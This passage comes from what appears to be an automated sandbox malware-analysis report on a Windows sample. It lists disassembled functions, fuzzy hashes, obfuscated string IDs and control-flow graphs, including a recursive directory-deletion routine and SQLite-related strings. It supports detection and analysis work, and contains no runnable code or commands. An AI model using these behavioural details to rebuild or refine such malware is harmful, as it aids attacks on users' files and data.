                                                                                                                                                                                    • Instruction Fuzzy Hash: EFE26A70D042599ADF25EBA0CC56BEDBBB8AF15304F4044A8E44977293EF742B88DF61
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00068C90 Relevance: 25.6, Strings: 19, Instructions: 1892COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: @^uS$BI^$BI^$BPYC$CGDK$DGFA$DGFA$IIDO$MEAK$O\]Z$QIE_$TMJ_$WI]B$YMYG$cannot use operator[] with a string argument with $dBAW$wI]B$wZFL${X[E
                                                                                                                                                                                    • API String ID: 0-3218710604
                                                                                                                                                                                    • Opcode ID: 6850140f5d64960e25d9ba2de70a658bb0c367a115654f0d454c3444f67d6044
                                                                                                                                                                                    • Instruction ID: 43dfe82e905ffc0f34760c8c21f2b6e0f2a33a36a705cc7bc502eacc0cb92bba
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6850140f5d64960e25d9ba2de70a658bb0c367a115654f0d454c3444f67d6044
                                                                                                                                                                                    • Instruction Fuzzy Hash: A203E070E00259CBDB25CF68CC44BEEBBB5AF15304F1441E8E449A7682EB75AE85CF91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0005DE70 Relevance: 20.8, Strings: 15, Instructions: 2085COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Initstd::locale::_
                                                                                                                                                                                    • String ID: OUSY$OUSY$OYSM$RRZM$RRZM$RT]X$RT]X$d]MN$d]MN$yicz$yicz$yicz${k|x${k|x${k|x
                                                                                                                                                                                    • API String ID: 1620887387-3943848870
                                                                                                                                                                                    • Opcode ID: 266ad6d0a6a0f2cbf6bcd8ecea2d28a6db72f51fc7458c8ceb98b802c78f4505
                                                                                                                                                                                    • Instruction ID: db8415989961f9f9f55bf788d5526be90af399ea7d95874a9745d104f4d01aff
                                                                                                                                                                                    • Opcode Fuzzy Hash: 266ad6d0a6a0f2cbf6bcd8ecea2d28a6db72f51fc7458c8ceb98b802c78f4505
                                                                                                                                                                                    • Instruction Fuzzy Hash: F913F2708002598FDF19CF68CD98BEEBBB5AF55304F1082D8E4496B292D7749B89CF61
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00067660 Relevance: 17.8, Strings: 13, Instructions: 1514COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: /,ms$AAEO$AAEO$HI^$MEAK$WI]B$\A][$cannot use operator[] with a string argument with $g`)#$wI]B$wZFL${XEK${X[E
                                                                                                                                                                                    • API String ID: 0-3600237339
                                                                                                                                                                                    • Opcode ID: 68f57b974a0a4efe66f54c2ab4962ccb6c8ebe2f9830221c7a08b16ec787ed3b
                                                                                                                                                                                    • Instruction ID: 2bdaa4d0be0bf6495012e8fa071e2133169b23b58b35e37e4f235ace78e062e2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 68f57b974a0a4efe66f54c2ab4962ccb6c8ebe2f9830221c7a08b16ec787ed3b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 15D2D370D042588FEF29CB64CC55BEEBBB5AF15304F1482D8E449A7282DB749B89CF91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00066590 Relevance: 17.4, Strings: 13, Instructions: 1195COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Mtx_unlock
                                                                                                                                                                                    • String ID: &$$=$;?#+$F]]E$F]]E$IIDO$MEAB$MEAB$MEAK$QIE_$cannot use operator[] with a string argument with $wI]B$wZFL${X[E
                                                                                                                                                                                    • API String ID: 1418687624-3597907084
                                                                                                                                                                                    • Opcode ID: 8f124c5c8bd478cd2f5831d2cc848c3be525c2d24fe42565e3260e4b5d488128
                                                                                                                                                                                    • Instruction ID: 852ce8895fe70184c5d9515615a1a2c07dd161e0c562600c2a84bb2ae47d8b3d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f124c5c8bd478cd2f5831d2cc848c3be525c2d24fe42565e3260e4b5d488128
                                                                                                                                                                                    • Instruction Fuzzy Hash: 08B2D070904258CFDB25CF64CC45BEEBBB5AF15304F1481DCE449AB282EB71AA89CF91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000602C0 Relevance: 11.5, APIs: 1, Strings: 5, Instructions: 975COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • std::locale::_Init.LIBCPMT ref: 0006097E
                                                                                                                                                                                      • Part of subcall function 000991D0: std::_Lockit::_Lockit.LIBCPMT ref: 000991FE
                                                                                                                                                                                      • Part of subcall function 000991D0: std::_Lockit::_Lockit.LIBCPMT ref: 00099221
                                                                                                                                                                                      • Part of subcall function 000991D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00099241
                                                                                                                                                                                      • Part of subcall function 000991D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00099275
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Initstd::locale::_
                                                                                                                                                                                    • String ID: BEHC$EM@K$HYOM$R[LX$n:
                                                                                                                                                                                    • API String ID: 1226965381-3806352440
                                                                                                                                                                                    • Opcode ID: ce8fd706cea5b0f79de8ae3e711c27ea09386d7517a93f1c7e8b04a8df505405
                                                                                                                                                                                    • Instruction ID: 30a19d9fa335b6ce067590d5ddc15389f580c7aaa4fd4ef5300a883d79f9460c
                                                                                                                                                                                    • Opcode Fuzzy Hash: ce8fd706cea5b0f79de8ae3e711c27ea09386d7517a93f1c7e8b04a8df505405
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8482F470D10248CFDF18DF68C8987EEBBB2BF55304F14829CE445AB692DB749A84CB91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0003C050 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 262COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 24166 3c050-3c088 call 10c3b3 24169 3c412-3c413 call 10c05c 24166->24169 24170 3c08e-3c0c7 24166->24170 24171 3c418 call 32040 24169->24171 24170->24171 24172 3c0cd-3c156 call 9d850 FindFirstFileA 24170->24172 24177 3c41d-3c422 call 112350 24171->24177 24182 3c369 24172->24182 24183 3c15c 24172->24183 24184 3c36b-3c371 24182->24184 24185 3c160-3c169 24183->24185 24186 3c373-3c37f 24184->24186 24187 3c39f-3c3b7 24184->24187 24188 3c170-3c175 24185->24188 24189 3c381-3c38f 24186->24189 24190 3c395-3c39c call 10d0b2 24186->24190 24192 3c3e1-3c411 call 10c3c4 24187->24192 24193 3c3b9-3c3c5 24187->24193 24188->24188 24191 3c177-3c1c3 24188->24191 24189->24177 24189->24190 24190->24187 24191->24171 24203 3c1c9-3c29c call 9d850 call 95b20 call 95c90 24191->24203 24197 3c3d7-3c3de call 10d0b2 24193->24197 24198 3c3c7-3c3d5 24193->24198 24197->24192 24198->24177 24198->24197 24214 3c29e-3c2a5 call 3c050 24203->24214 24215 3c2bc-3c2d5 24203->24215 24214->24215 24218 3c2db-3c2ef 24215->24218 24219 3c35f-3c367 24215->24219 24218->24219 24222 3c2f1-3c302 FindNextFileA 24218->24222 24219->24184 24222->24185 24223 3c308-3c31a 24222->24223 24223->24184 24226 3c31c-3c322 24223->24226 24227 3c326-3c334 SetFileAttributesA 24226->24227 24228 3c324 24226->24228 24229 3c341-3c345 24227->24229 24230 3c336-3c33f 24227->24230 24228->24227 24231 3c347 24229->24231 24232 3c349-3c352 RemoveDirectoryA 24229->24232 24230->24184 24231->24232 24232->24182 24234 3c354-3c35d 24232->24234 24234->24184
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                    • API String ID: 0-1173974218
                                                                                                                                                                                    • Opcode ID: 4c18e04266c7738a5ece624366495c5f2e76cb5c6d7ec7715a441c1b5a7f27a0
                                                                                                                                                                                    • Instruction ID: 22a292d44d86e24c032276fc3831b41941bf6f2bb95ebed743fcda1a5fcf45fd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c18e04266c7738a5ece624366495c5f2e76cb5c6d7ec7715a441c1b5a7f27a0
                                                                                                                                                                                    • Instruction Fuzzy Hash: EA91C4719002089FEB16DBA8CD54BEEB7B9EF15304F244658E451F7182DB71AE84CBA0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0010A930 Relevance: 9.2, Strings: 7, Instructions: 490COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 24769 10a930-10a94e call 109430 24772 10afb1-10afb7 24769->24772 24773 10a954-10a95d 24769->24773 24774 10a963-10a969 24773->24774 24775 10a95f-10a961 24773->24775 24777 10a96b-10a96d 24774->24777 24778 10a96f-10a980 24774->24778 24776 10a983-10a989 24775->24776 24779 10a993-10a99a 24776->24779 24780 10a98b-10a991 24776->24780 24777->24776 24778->24776 24781 10a9a2-10a9b9 call bb6e0 24779->24781 24782 10a99c 24779->24782 24780->24781 24785 10af96 24781->24785 24786 10a9bf-10a9d1 call 10f090 24781->24786 24782->24781 24788 10af98 24785->24788 24791 10aa75-10aa7a 24786->24791 24792 10a9d7-10a9de 24786->24792 24790 10af9f-10afa7 call 109f70 24788->24790 24800 10afa9-10afaf 24790->24800 24795 10aa86-10ab3e call bb260 24791->24795 24796 10aa7c-10aa83 24791->24796 24797 10a9e0-10a9e7 24792->24797 24798 10a9e9-10a9f9 24792->24798 24809 10ab40-10ab51 call bda80 24795->24809 24810 10ab56-10abc5 call 10a790 * 4 24795->24810 24796->24795 24799 10a9fb-10aa02 24797->24799 24798->24791 24798->24799 24803 10aa64-10aa6b 24799->24803 24804 10aa04-10aa0b 24799->24804 24800->24772 24815 10aa6e-10aa70 24803->24815 24807 10aa17-10aa51 24804->24807 24808 10aa0d-10aa14 24804->24808 24807->24815 24827 10aa53-10aa5f 24807->24827 24808->24807 24820 10af20 24809->24820 24821 10af22-10af27 24810->24821 24839 10abcb-10ac13 call e6960 call 10a790 24810->24839 24815->24788 24820->24821 24824 10af33-10af3b 24821->24824 24825 10af29-10af30 24821->24825 24829 10af66-10af6c 24824->24829 24830 10af3d-10af42 24824->24830 24825->24824 24827->24788 24829->24788 24834 10af6e-10af7a 24829->24834 24830->24829 24833 10af44-10af49 24830->24833 24833->24829 24837 10af4b-10af65 24833->24837 24834->24790 24838 10af7c-10af7e 24834->24838 24838->24800 24840 10af80-10af95 24838->24840 24845 10ac15-10ac18 24839->24845 24846 10ac1a-10ac20 24839->24846 24845->24846 24847 10ac26-10ac37 call c67a0 24845->24847 24846->24847 24850 10adc5-10addf call bda80 24847->24850 24851 10ac3d-10ac45 24847->24851 24850->24820 24852 10ac4b-10ac5f 24851->24852 24853 10adbd-10adbf 24851->24853 24852->24853 24855 10ac65-10ac71 24852->24855 24853->24850 24856 10ac74-10acc4 call e6f10 * 2 24853->24856 24855->24856 24856->24821 24863 10acca-10acf5 call bda80 call 10a610 24856->24863 24868 10ad93-10ada1 24863->24868 24869 10acfb 24863->24869 24871 10ada7-10adac 24868->24871 24872 10aed9-10aee1 24868->24872 24870 10ad00-10ad04 24869->24870 24870->24870 24873 10ad06-10ad17 24870->24873 24876 10adb0-10adb7 24871->24876 24874 10aef1-10aef5 24872->24874 24875 10aee3-10aee8 24872->24875 24877 10ad23-10ad3b call e6bb0 24873->24877 24878 10ad19-10ad20 24873->24878 24874->24820 24880 10aef7-10aefd 24874->24880 24875->24874 24879 10aeea-10aeef 24875->24879 24881 10ade4-10adf3 24876->24881 24882 10adb9-10adbb 24876->24882 24894 10ad59-10ad5f 24877->24894 24895 10ad3d-10ad56 call 10a610 24877->24895 24878->24877 24879->24820 24879->24874 24880->24820 24884 10aeff-10af18 call bda80 call 109bc0 24880->24884 24885 10adff-10ae05 24881->24885 24892 10adf5-10adfc 24881->24892 24882->24885 24910 10af1d 24884->24910 24888 10ae07-10ae0c 24885->24888 24889 10ae0e-10ae13 24885->24889 24893 10ae16-10ae18 24888->24893 24889->24893 24892->24885 24897 10ae24-10ae2b 24893->24897 24898 10ae1a-10ae21 24893->24898 24900 10ad61-10ad71 call bda80 24894->24900 24901 10ad76-10ad7e 24894->24901 24895->24894 24907 10ae59-10ae5b 24897->24907 24908 10ae2d-10ae3e 24897->24908 24898->24897 24900->24901 24903 10ad80-10ad87 24901->24903 24904 10ad8a-10ad8d 24901->24904 24903->24904 24904->24868 24913 10ad8f 24904->24913 24911 10aec8-10aed3 24907->24911 24912 10ae5d-10ae64 24907->24912 24922 10ae40-10ae53 call bda80 24908->24922 24923 10ae56 24908->24923 24910->24820 24911->24872 24911->24876 24917 10ae66-10ae6d 24912->24917 24918 10aebe 24912->24918 24913->24868 24920 10ae79-10aeb3 24917->24920 24921 10ae6f-10ae76 24917->24921 24925 10aec5 24918->24925 24920->24911 24930 10aeb5-10aebc 24920->24930 24921->24920 24922->24923 24923->24907 24925->24911 24930->24925
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000016C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000002F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000416000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705654161.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2709331856.000000000042E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711157765.00000000005D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2711358566.00000000005D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_30000_I2jCDr35mu.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: BINARY$MATCH$NOCASE$RTRIM$automatic extension loading failed: %s$no such vfs: %s$sqlite_rename_table
                                                                                                                                                                                    • API String ID: 0-1885142750
                                                                                                                                                                                    • Opcode ID: 139c69f87d30f0fcf867fa20ed337b7b8ef59a3845f10a2d440466e4da8e09c9
                                                                                                                                                                                    • Instruction ID: daef450681df1e501f10ead0ec949868ae088cc24b03c54e10b44e5da98371ed
                                                                                                                                                                                    • Opcode Fuzzy Hash: 139c69f87d30f0fcf867fa20ed337b7b8ef59a3845f10a2d440466e4da8e09c9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 740213B0B007019FEB208F64DC45B6B77E5AF50704F54442CE89A9B6D2E7F5EA84CB92
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00083350 Relevance: 6.6, Strings: 5, Instructions: 334COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 24932 83350-83374 24933 83376-83398 24932->24933 24934 8339e-8341d call 95e10 * 3 call 648e0 24933->24934 24935 838f6-83908 24933->24935 24944 83420-8342b 24934->24944 24944->24944 24945 8342d-834de call 99ec0 call 93910 call 93510 call 938b0 * 2 call 95e10 call 66590 24944->24945 24960 834e0-834eb 24945->24960 24960->24960 24961 834ed-83598 call 99ec0 call 93910 call 93510 call 938b0 * 2 call 95e10 call 67660 24960->24961 24976 835a1-835af 24961->24976 24976->24976 24977 835b1-83662 call 99ec0 call 93910 call 93510 call 938b0 * 2 call 95e10 call 68c90 24976->24977 24992 83666-83671 24977->24992 24992->24992 24993 83673-8370c call 99ec0 call 93910 call 93510 call 938b0 * 2 call 95e10 call 6a700 24992->24993 25007 83711-8372e 24993->25007 25008 83730-8373b 25007->25008 25008->25008 25009 8373d-837c5 call 99ec0 call 93910 call 93510 call 938b0 * 2 25008->25009 25009->24933
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.2703469211.0000000000031000.00000040.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.2703266586.0000000000030000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2703469211.0000000000163000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.2705315515.0000000000167000.00000004.00000001.01000000.00000003.sdmpDownload File
